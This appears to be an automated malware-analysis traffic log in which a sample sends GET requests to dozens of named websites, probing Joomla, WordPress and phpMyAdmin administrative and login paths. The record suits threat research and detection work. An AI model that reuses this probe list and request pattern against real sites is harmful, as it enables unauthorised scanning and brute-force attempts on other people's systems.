Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: videolifeperu.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://videolifeperu.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: smartiebritches.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://smartiebritches.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: aikya.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: kegerators.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: pmcsystem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: derrickandbriggs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://derrickandbriggs.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: coupons2grab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: kegerators.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://kegerators.net/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator HTTP/1.1Host: ismaworld.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pmcsystem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pmcsystem.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ireland-ventures.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: sunbeltfinancial.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: yuejichem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: shapeab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: easlab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: coupons2grab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: grassgraphics.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eddc.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: keywordranker.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: maroonshockey.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: enricobassi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: mcammond.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: harrell-associates.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: derrickandbriggs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://derrickandbriggs.com/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: buyhits.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sunbeltfinancial.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jiashi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pmcsystem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: videolifeperu.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: jiashi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ismaworld.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ismaworld.com/administrator
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tgeddesgrant.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: harrell-associates.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://harrell-associates.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://davescheirer.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: shapeab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://shapeab.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ireland-ventures.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ireland-ventures.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: sunbeltfinancial.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://sunbeltfinancial.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: easlab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://easlab.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jiashi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jiashi.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: grassgraphics.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://grassgraphics.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: oljud.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: buyhits.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: easlab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: grassgraphics.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 51goabroad.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: pcfocus.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: covicol.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: oljud.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://oljud.net/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aikya.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: customintegrated.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: shapeab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: videolifeperu.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jiashi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: harrell-associates.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: smartiebritches.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: kegerators.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /?not_found=aldine.org.com HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: maroonshockey.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oljud.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: derrickandbriggs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /?not_found=aldine.org.com HTTP/1.1Host: www.org.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.coupons2grab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ireland-ventures.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pmcsystem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: enricobassi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: indfos.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: esisalama.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: grassgraphics.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: sunbeltfinancial.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: jiashi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://oceanictrailers.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: easlab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: shapeab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: geis.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: kegerators.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://kegerators.net/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: smartiebritches.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://smartiebritches.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: harrell-associates.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://harrell-associates.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tgeddesgrant.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://davescheirer.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: customintegrated.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
